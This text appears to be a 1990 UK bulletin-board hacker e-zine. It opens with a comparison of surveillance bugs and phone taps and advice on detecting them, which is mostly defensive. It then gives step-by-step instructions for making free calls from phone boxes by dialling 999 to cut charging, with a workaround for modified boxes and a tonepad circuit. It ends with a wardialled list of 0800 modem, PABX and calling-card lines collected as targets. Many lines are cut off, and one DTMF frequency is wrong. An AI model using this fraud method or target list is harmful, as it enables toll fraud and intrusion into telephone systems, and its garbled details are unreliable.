results depends on thickness
|
|||
|
of wall ( sounding board ).
|
|||
|
Difficult to detect.
|
|||
|
|
|||
|
Tube Mic. Can be pushed through cracks
|
|||
|
wall, through keyholes, unde
|
|||
|
doors, in back to back socke
|
|||
|
installation canbe noisy
|
|||
|
(drill holes), work well.
|
|||
|
Very difficult to detect.
|
|||
|
|
|||
|
Spike Mic. Noisy and difficult to insta
|
|||
|
but can work well. Difficult
|
|||
|
detect. But can be detected
|
|||
|
metal detector.
|
|||
|
|
|||
|
Infinity Transmitter Fitted easily along phone li
|
|||
|
carries conversation anywher
|
|||
|
works, good quality and hard
|
|||
|
to detect.
|
|||
|
|
|||
|
Laser Bug Safest way, but expensive.
|
|||
|
|
|||
|
|
|||
|
Telephone Tapping
|
|||
|
|
|||
|
Type Remarks
|
|||
|
|
|||
|
|
|||
|
Direct Tap Simple to install, especially at terminal box,
|
|||
|
Headphones can be used, or drop out relay and recorde
|
|||
|
Very good quality.
|
|||
|
|
|||
|
Inductive Tap No connections needed, easy to install but has to be
|
|||
|
close to phone, needs wiring to transmitter - can be
|
|||
|
easy to detect. Quality is poor.
|
|||
|
|
|||
|
Series or Parallel Can be connected anywhere along the line or concealed
|
|||
|
Tap in phone or junction box. Transmits phone conversatio
|
|||
|
to receiver, poor quality ( as in radio bug) but can
|
|||
|
power from line or battery.
|
|||
|
|
|||
|
Third Wire Bug As above but transmits romm conversation when phone n
|
|||
|
in use.
|
|||
|
|
|||
|
Lost transmitter Made to blend in with background of electronics
|
|||
|
components - expensive, dificult to fit but equally
|
|||
|
difficult to detect.
|
|||
|
|
|||
|
Drop in Bug Simple to install and some difficult to detect by
|
|||
|
physical search. Needs no attention and is reliable.
|
|||
|
|
|||
|
|
|||
|
Detecting
|
|||
|
|
|||
|
1. Physical search - start outside the house and walk slowly around it and
|
|||
|
examine eveything carefully, look for any wires going int
|
|||
|
Outside House the walls and make sure you know what they are for and
|
|||
|
follow them back to the pole etc. look for wires spliced
|
|||
|
into the cable, particularly in the top of the pole. Ther
|
|||
|
may be an inspection hatch if the cables go under ground
|
|||
|
so try and lift and inspect it. If in a large building
|
|||
|
look in the terminal box for any wires across terminals i
|
|||
|
anything suspicious is found then call the company. While
|
|||
|
walking outside examine the windows ( frames as well) loo
|
|||
|
for signs of disturbance.
|
|||
|
|
|||
|
Inside House Examine ALL furniture, check backs and drawers, wardrobes
|
|||
|
etc. Look under beds - under the fabric underneath, look
|
|||
|
for holes, bedrooms are favourite. Standard bugs have a w
|
|||
|
trailing from them, and a battery on the outside. Don`t
|
|||
|
forget all the disguised bugs and any household ornaments
|
|||
|
remnove green felt or feel underneath for holes.Ask where
|
|||
|
all objects came from, look at all pictures and frames ma
|
|||
|
sure they haven`t been tampered with . Examine walls,
|
|||
|
ceilings and floors, also curtains and pelmets, roll back
|
|||
|
carpets and examine floorboards. Anything suspicious then
|
|||
|
take up the floor boards and have a look. Look for any
|
|||
|
suspicious wires tucked under the edges of carpets. Alway
|
|||
|
examine ceilings from above if possible, especially in
|
|||
|
bedrooms, wear overalls. If only from below have a look
|
|||
|
at flaking paint in walls and ceiling and look for mis-
|
|||
|
matched areas of paint. Examine any holes but check for
|
|||
|
electrical wires etc. first. Houses and apartments with
|
|||
|
party walls have problems, the best way to see these is t
|
|||
|
check for flaking paint or small holes. Don`t go round to
|
|||
|
neighbours whenn found - they aren`t going to let you in
|
|||
|
they have bugged you. You can dig away at the wall and kn
|
|||
|
the spike out. Holes for tube mikes can be blocked up wit
|
|||
|
plaster filler effectively knocking it out. Switch off th
|
|||
|
mains and look at light sockets ( unscrew ), and look for
|
|||
|
any extra components. With the power unscrew the ceiling
|
|||
|
roses and take a look inside, also any other light
|
|||
|
fittings.
|
|||
|
|
|||
|
The telephone Pickup the handset and unscrew, examine the telephone
|
|||
|
thoroughly, small bkack cubes with wires are trouble, che
|
|||
|
the hookswitch action, make sure it shuts off the mic,
|
|||
|
examine all wires thoroughly and see where they go, check
|
|||
|
to see if any are thinnner or thicker and if they use pro
|
|||
|
terminals or not. Put phone back together and check junct
|
|||
|
box, look at terminals and check telegraph pole and the
|
|||
|
junction box at the top.
|
|||
|
|
|||
|
2. Electrical First use metal detector,check walls, celings, floors any
|
|||
|
pipes will run in a straight line , helpful to know where
|
|||
|
the pipes etc. run Check any ornaments with the detector
|
|||
|
shake ornaments and check weight, look at base for holes
|
|||
|
covered with filler.
|
|||
|
|
|||
|
If no equipment use VHF radio and turn control to see if
|
|||
|
any screech happens, put next to phone if screech then th
|
|||
|
line bug, make a call and test again , check junction box
|
|||
|
same way, Use tv with indoor aerial, make a loud noise an
|
|||
|
turn tv down and tune tv - if a bug then horizontal lines
|
|||
|
appear which wil jump to the music - nearer the bug large
|
|||
|
the jump, - this will pick up the bug ( if VHF) from a
|
|||
|
distance away , send the sound source to several adjoinin
|
|||
|
rooms to detect bugs further away. If found carry on onto
|
|||
|
rest of bandwidth, get someone to make a call and check
|
|||
|
again. examine terminal box - voltage between terminals
|
|||
|
should be 46-50v if lower may be a bug in parallel, infin
|
|||
|
drop till under 10, lift handset measure voltage 2-12v. i
|
|||
|
higher then something connected in series (series bug).
|
|||
|
Open phone and check microphone terminals - hold down hoo
|
|||
|
switch and if voltage across mic then hookswitch defeat e
|
|||
|
Check volts across terminal while sending tones down line
|
|||
|
Examine car, underneath for homers, look at woring for
|
|||
|
splicing and under dash, feedback search,
|
|||
|
|
|||
|
Deterrence Paint a thin stripe of nail varnish across gaps, tighten
|
|||
|
screws then undo by a quarter or 3/4 then make a note of
|
|||
|
where the slots and the screws are. Apply to junction box
|
|||
|
too. Check all people coming in and restrict entry - watc
|
|||
|
at all times. If to toilet go to bedroom and find summit
|
|||
|
do. If bug found hold a bait meeting to lure eaves droppe
|
|||
|
If not return to bug and drain bettery so has to replace.
|
|||
|
if bug reconnect wire several times while making a call,
|
|||
|
series jiggle the hookswitch and then cut off bug.
|
|||
|
|
|||
|
Training Use labur force, Carbon ribbons just dumped in bin wherea
|
|||
|
documents shredded. Short hand pads left in drawer docume
|
|||
|
locked away. People wander around freely - ask who - if
|
|||
|
be careful of security etc. car phone a big risk and
|
|||
|
portable or freeway wireless ones. use phones far away fr
|
|||
|
hotels etc. use different tables at restaurants etc. lase
|
|||
|
bug prevent heavy curtains blinds etc. and clean windows
|
|||
|
( dirty ones reflect more) - itemised phone bills, cellul
|
|||
|
radio - big brother - easy to detect, satellite,
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Detecting Bugs
|
|||
|
|
|||
|
This can be quite cheap and easy.
|
|||
|
|
|||
|
Field Strength Meter
|
|||
|
|
|||
|
This is bascially a crystal radio set connected to a meter instead of a speake
|
|||
|
It shows the power output of any transmitter in the vicinity and is sold as an
|
|||
|
aid to ham radio operators. The sensitivity is low so detection should not be
|
|||
|
further than 12 inches away from the bug. If it does detect something the need
|
|||
|
will swing across so the furthest swing will be closest to the meter. A proble
|
|||
|
can be that they will react to a passing polics car or a commercial radio
|
|||
|
station. If one is bought with a receiver circuit then it is tunable so you ca
|
|||
|
tune into the frequency of the bug. Also an amplifier can aid detection.
|
|||
|
|
|||
|
Feed Back Detector
|
|||
|
|
|||
|
When a transmitter gets to close to a receiver then feedback is produced ( if
|
|||
|
at the same frequency). This type of detector relies on feedback and is couple
|
|||
|
to an amplifier and a receiver circuit. When using these you will need a noise
|
|||
|
for the bug to transmit ( singing etc.) ,Then you simply scan through the
|
|||
|
frequencies and if there is a bug transmitting you will get a squeal as the
|
|||
|
detector hits the same frequency.
|
|||
|
The Feedback detector generally has a further range but can tip off an
|
|||
|
eavesdropper because of the noise.
|
|||
|
|
|||
|
Telephone Analyser
|
|||
|
|
|||
|
This is expensive equipment which will carry out a series of tests on a phone
|
|||
|
line semi automatically. These are particularly useful when dealing with
|
|||
|
complicated phone set ups like a switchboard. Tracing an individual pair of
|
|||
|
wires without one of these can be tedious.
|
|||
|
|
|||
|
The tests actually carried out vary from machine to machine, they usually come
|
|||
|
in attache cases and are battery powered. The first test will be to measure th
|
|||
|
voltage across a phone line when the phone is on and off the hook. If the volt
|
|||
|
is lower than it should be it may be a bug. If the voltage at the mic is too h
|
|||
|
then it could be a bug. There is no difference between this and an ordinary vo
|
|||
|
meter. The next test is a tone sweep, the analyser sweeps through the spectrum
|
|||
|
and then if anything which reacts to a tone is on the line it will reduce the
|
|||
|
voltage on the line and the analyser will detect this, stop and give you a
|
|||
|
warning.
|
|||
|
|
|||
|
The next test is high voltage pulsing a charge is built up then fired down the
|
|||
|
line, some hookswitch defeats use a change of voltage to trigger them, if
|
|||
|
a hook switch is activated the analyser will pick up the voltage of the
|
|||
|
microphone and the alarm will go off.
|
|||
|
|
|||
|
Another test is audio listening, the operator will listen to the line and an
|
|||
|
acoustic generator is switched on. If the operator hears a tone down the line
|
|||
|
then some osrt of hookswitch defeat is in operation, this method can also dete
|
|||
|
infinity transmitters as any noise will be transmitted down the line which the
|
|||
|
operator will hear. Each individual wire is tested against each other to see i
|
|||
|
the sound from the generator is being transmitted down the phone line. (n.b.
|
|||
|
tone has to be around voice frequency).
|
|||
|
|
|||
|
Any good analyser wil test al these any may even test for conductive paint on
|
|||
|
casing being used.
|
|||
|
|
|||
|
Spectrum Analyser
|
|||
|
|
|||
|
This sweeps entire frequency bands in the same way as a field strength meter
|
|||
|
searches for radiation. A typical sophisticated Spectrum Analyser can sweep
|
|||
|
between 20 kilohertz and 2000 megahertz. Some can do this all in one go or in
|
|||
|
separate plug in modules. It should carry out the scan automatically and when
|
|||
|
it detects a transmission it will stop and display the frequency, and the
|
|||
|
strength of the signal on a field strength meter and let you listen to the
|
|||
|
transmission on an internal speaker. Some analysers have a cathode ray tube
|
|||
|
as an oscilloscope to display the waveform and even buy another CRT which show
|
|||
|
the frequency versus amplitude of demodulated components of the primary signal
|
|||
|
such as subcarriers, and a second frequency indicator for the subcarrier.
|
|||
|
|
|||
|
You can pick up a spectrum analyser which detects RF radiation including singl
|
|||
|
sideband, pulse width transmissions and those with the carrier wave removed, o
|
|||
|
a very wide band coverage.
|
|||
|
|
|||
|
Cable Checkers
|
|||
|
|
|||
|
This is just a portable metal detector to see where mysterious wiring is going
|
|||
|
they can be bought anywhere. Also a screamer is available which will detect
|
|||
|
whther there is a microphone on either end and the MIC will emit a loud noise
|
|||
|
and so can be located. Also you can use an inductive mic and an amplifier to
|
|||
|
check to see if anything is on the line.
|
|||
|
|
|||
|
Detectors can be built using a field strength meter and replacing it with a
|
|||
|
led, some have a sensitivity control.
|
|||
|
|
|||
|
Another way to detect a bug is to install a telephone watchdog which detects
|
|||
|
the resistance or capacitance of the line, if anybody cuts in or installs a bu
|
|||
|
the devices led will go on - this will only respond to change so any bug on
|
|||
|
already wil not be detected.
|
|||
|
|
|||
|
Scramblers - simple scramblers are available, but so are descrambler`s. The
|
|||
|
more expensive scramblers alter the frequency and parts of speech around 650
|
|||
|
to 750 times a second. These can virtually defeat any attempt to descramble,
|
|||
|
except of course the american security agency.
|
|||
|
|
|||
|
Jammers - these are simply wide band transmitters which transmit white noise.
|
|||
|
these will also jam tv`s radios etc....Another jammer uses two high frequency
|
|||
|
transmitters and will cause any microphone to squeal at the difference between
|
|||
|
the two. Another magnetically induces an intense noise in the handset micropho
|
|||
|
which will block any infinity or hookswitch defeats. Any contact mics can be
|
|||
|
jammed by buzzers or vibrators stuck to the window or sounding board.
|
|||
|
|
|||
|
THE detector - all bugs use at least one semi conductor, if an ultra high
|
|||
|
freqency carrier wave is emmited it will be radiated back by the bug. This
|
|||
|
radiation will contain strong harmonic components - ( a harmonic is a componen
|
|||
|
where the frequency is an exact numerical multiple of the fundamental or
|
|||
|
strongest frequency. This strongest frequency is the first harmonic, twice the
|
|||
|
frequency is the second harmonic and so on.). Other objects will only radiate
|
|||
|
back to the second harmonic and only a semi-conductor junction will produce a
|
|||
|
third harmonic. A small UHF transmitter and a reciver tuned to the third
|
|||
|
harmonic is all that is needed ( use like a field strength meter), the radiati
|
|||
|
emitted back will be minute so teh detector will be expensive and have to be v
|
|||
|
close to the bug.
|
|||
|
|
|||
|
|
|||
|
--------------------- Palm Beach BBS - +44(303)-265979 -----------------------
|
|||
|
|
|||
|
----------------------------------------------------------------------------
|
|||
|
| |
|
|||
|
| ELEKTRIX Issue 1 - Part 4 |
|
|||
|
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
|||
|
| |
|
|||
|
| Make your own Tonepad for Phone Box phreaking |
|
|||
|
| by Maxhack |
|
|||
|
| |
|
|||
|
| PALM BEACH BB UK ++44(303)-265979 |
|
|||
|
| |
|
|||
|
----------------------------------------------------------------------------
|
|||
|
|
|||
|
The Technique
|
|||
|
|
|||
|
Some weeks ago free dialling with tonepads came to the news in a daily
|
|||
|
newspaper. Since then there has been much in the way of media hype covering
|
|||
|
these devices in computer magazines and hackers files. This file will, I
|
|||
|
hope,make the whole practise clear and the method easy and also less costly
|
|||
|
than previously.
|
|||
|
The way it works is as follows: The technique will ONLY work from phone
|
|||
|
boxes contrary to what you may have been told. You may also find that it is
|
|||
|
not working on some London phone boxes - this is due to the fact that many
|
|||
|
have been modified to disallow phreakers from using the method.
|
|||
|
The technique relies on the fact that dialling 999 on a phone box auto-
|
|||
|
matically disconnects the charging mechanism whilst the call is being made.
|
|||
|
The tonepads which allow people to make free calls are just portable models
|
|||
|
of the tone-dialling telephone circuits that are in your telephones and in
|
|||
|
modern modems. The tones they generate are perfectly 'legal' and are simply
|
|||
|
used in portable units for Computerdial services (Share price indexes,etc.)
|
|||
|
for travelling businessmen and other groups who may use such services (like
|
|||
|
voice mail or whatever). All you do is the following:
|
|||
|
|
|||
|
[1] Go to a phone box.
|
|||
|
[2] Dial the number you wish to connect to using the keypad.
|
|||
|
[3] As soon as the phone starts ringing dial 999 on the phonebox machine as
|
|||
|
fast as possible. This will have cut the charging mechanism and you will
|
|||
|
have a free call.
|
|||
|
|
|||
|
* For boxes that have been modified......Simply put 10p in first then do *
|
|||
|
* it - you won't loose your money but you will still make a free call. *
|
|||
|
* This has to be done since they are modified so that they won't dial a *
|
|||
|
* number (except 999/linkline 0800/government) unless money has been dep *
|
|||
|
* osited in the machine.
|
|||
|
|
|||
|
|
|||
|
Method 1
|
|||
|
--------
|
|||
|
|
|||
|
You can record the tones required to dial a number onto a tape and then
|
|||
|
play them down the telephone with a standard taperecorder. This has three
|
|||
|
main drawbacks however although it is the least costly method.
|
|||
|
|
|||
|
1) You will need to record a different set of tones for each number. So un-
|
|||
|
less you dial a few numbers repeatedly then you are going to find this
|
|||
|
method very tiresome. You'll need to have a DTMF modem/phone too.
|
|||
|
|
|||
|
2) The phone system requires that each tone is within 1.5% of the specified
|
|||
|
frequencies. This will prove to be difficult if you don't own very good
|
|||
|
recording equipment.
|
|||
|
|
|||
|
3) You will look very conspicuous playing around with a tape recorder in a
|
|||
|
phone box.
|
|||
|
|
|||
|
Despite the disadvantages it has to be remembered that this method is the
|
|||
|
cheapest option open to you.
|
|||
|
|
|||
|
|
|||
|
Method 2
|
|||
|
--------
|
|||
|
|
|||
|
This involves building your own portable tonepad (unless you want to fork
|
|||
|
out <20>12-50 for a Tandy one). The device is small, effective and relatively
|
|||
|
cheap.
|
|||
|
|
|||
|
One method is as follows:
|
|||
|
|
|||
|
|
|||
|
[Battery] _______
|
|||
|
+9V --------|6 |----<14-----123
|
|||
|
| |----<13-----456 Numeric Keypad lines
|
|||
|
| |----<12-----789
|
|||
|
--------|16 |----<11-----*0#
|
|||
|
[Speaker] S | |----<3------'||
|
|||
|
--------|1 |----<4-------'|
|
|||
|
| | | |----<5--------'
|
|||
|
| --|15 7|---
|
|||
|
| | | X [3.579545 MHz Crystal]
|
|||
|
| | 8|---
|
|||
|
| -------
|
|||
|
GND TCM5087
|
|||
|
(-Ve on battery)
|
|||
|
|
|||
|
That way is simple to build since few components are needed...get a keypad
|
|||
|
off an old remote controller or something...or make your own from Push-to-
|
|||
|
make switches. Other methods include using two 555s to generate the tones
|
|||
|
or two 8037s (wave form gen. chips) though this is a little too expensive
|
|||
|
for my liking and only needs more complex circuitry.
|
|||
|
|
|||
|
If you intend to use 555s then you'll need a monostable on each 555 and the
|
|||
|
frequencies used are as follows:
|
|||
|
|
|||
|
* - 941 & 1209 Hz
|
|||
|
# - 941 & 1477 Hz
|
|||
|
0 - 941 & 1336 Hz
|
|||
|
1 - 697 & 1209 Hz
|
|||
|
2 - 697 & 1336 Hz
|
|||
|
3 - 697 & 1477 Hz
|
|||
|
4 - 770 & 1209 Hz
|
|||
|
5 - 770 & 1306 Hz
|
|||
|
6 - 770 & 1477 Hz
|
|||
|
7 - 852 & 1209 Hz
|
|||
|
8 - 852 & 1336 Hz
|
|||
|
9 - 852 & 1477 Hz
|
|||
|
|
|||
|
|
|||
|
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
|
|||
|
|
|||
|
----------------------------------------------------------------------------
|
|||
|
| |
|
|||
|
| ELEKTRIX Issue 1 - Part 5 |
|
|||
|
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
|||
|
| |
|
|||
|
| Freefone interrogation - the ultimate listing |
|
|||
|
| by Agent 7 |
|
|||
|
| |
|
|||
|
| PALM BEACH BB UK ++44(303)-265979 |
|
|||
|
| |
|
|||
|
----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
I have undertaken a massive dial through of LINKLINE (0800) numbers to be
|
|||
|
listed in this and forthcoming issues of ELEKTRIX. All were known to be in
|
|||
|
working order when this first issue went out - May 1990. Some you may have
|
|||
|
seen before - others you won't. I've simply collected all the known ones I
|
|||
|
could find which were still working and listed useful information for each.
|
|||
|
Since there seems to be much going on with Voice mailboxes, computerdial,
|
|||
|
test lines, and PABX hacking lately I have included these too with comments
|
|||
|
where appropriate as well as the standard modem lines. Since on occasions a
|
|||
|
great many numbers 'side by side' have been engaged at the same time I have
|
|||
|
included this since it may give clues to the nature of the line-use should
|
|||
|
you wish to pursue these.
|
|||
|
The ranges that I have dialled through myself have not always been in a
|
|||
|
logical fashion - but then it gets real boring dialling through 1000 dead
|
|||
|
numbers. So I try to vary it. But the results have been reasonable. If you
|
|||
|
have made any dials through 0800 or just modem wardials then please let us
|
|||
|
have the results so we can share them with others - it's also pointless two
|
|||
|
people dialling through the same ranges.
|
|||
|
I hope these lists bring you much fun! Regards Pop
|
|||
|
|
|||
|
Key: node = (xxx---)
|
|||
|
number = (---xxx)
|
|||
|
|
|||
|
Node info:
|
|||
|
|
|||
|
321 - This seems to be a test area for BT's latest projects (voicedial,
|
|||
|
computerdial, intelligent fax services etc.)
|
|||
|
|
|||
|
|
|||
|
node number results notes
|
|||
|
---- ------ ------- -----
|
|||
|
|
|||
|
321 100 computerdial Announced as 'Remote Update', it
|
|||
|
requires 3 digit service codes.
|
|||
|
101-109 no service
|
|||
|
110 digital recording 'This service is no longer avail-
|
|||
|
able'.
|
|||
|
111 digital recording 'Goodbye'.
|
|||
|
112 digital recording 'Goodbye'.
|
|||
|
113 digital recording 'Please press start on your fax
|
|||
|
+ fax response machine'.
|
|||
|
114-115 computerdial British Telecom Weather Centre.
|
|||
|
+ optional fax With voice + fax forecasts.
|
|||
|
116 digital recording 'Goodbye'.
|
|||
|
117 digital recording 'This is 0800 briefing'.
|
|||
|
+ fax response
|
|||
|
118 computerdial Puzzleline test service.
|
|||
|
+ optional fax
|
|||
|
119 computerdial BTRL estate agency test service.
|
|||
|
120 PABX computerdial In the form xxx. 580 - 0800 Brief
|
|||
|
Response#1 'That number is not
|
|||
|
listed.'
|
|||
|
Response#2 'That number was not
|
|||
|
specified correctly.'
|
|||
|
121-123 fax response
|
|||
|
124-126 PABX computerdial
|
|||
|
127-129 fax response
|
|||
|
130-139 rings and rings
|
|||
|
140-141 No service
|
|||
|
142 Engaged
|
|||
|
143 No service
|
|||
|
144 Engaged
|
|||
|
145-146 No service
|
|||
|
147 rings and rings
|
|||
|
148-149 No service
|
|||
|
150-179 Engaged
|
|||
|
180-199 rings and rings
|
|||
|
|
|||
|
282 443 MODEM 2400 Does nothing
|
|||
|
809 Weird Autoanswers then nothing
|
|||
|
861 MODEM 1200/75
|
|||
|
871 MODEM 1200 8/N/1 Does nothing
|
|||
|
|
|||
|
289 237 STRANGE TONES
|
|||
|
384 Voice recording '45-55' - Weird
|
|||
|
485 MODEM 1200/75
|
|||
|
643 MODEM 2400 The old US dialout
|
|||
|
783 MODEM 1200/75
|
|||
|
817 MODEM 1200 7/E/1 Comes up with '+++ ? ERROR'
|
|||
|
CTRL-E gives '28301 DMLDN G'
|
|||
|
Enter SYS - gives '+++ STF GO'
|
|||
|
|
|||
|
456 100 Computerdial BT Service centre computerdial sys
|
|||
|
|
|||
|
521 509 MODEM 2400 Weird prompt
|
|||
|
|
|||
|
585 111 MODEM 1200/75 Cambridge PSS port - not connected
|
|||
|
|
|||
|
891 002 PABX Resource line DTMF then * code
|
|||
|
004 AT&T CARD PABX Calling card service
|
|||
|
831 MODEM 2400 Yale Direct login
|
|||
|
|
|||
|
898 058 PABX
|
|||
|
|
|||
|
|
|||
|
Uptodate list to be included in each ELEKTRIX issue.....
|
|||
|
|
|||
|
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
|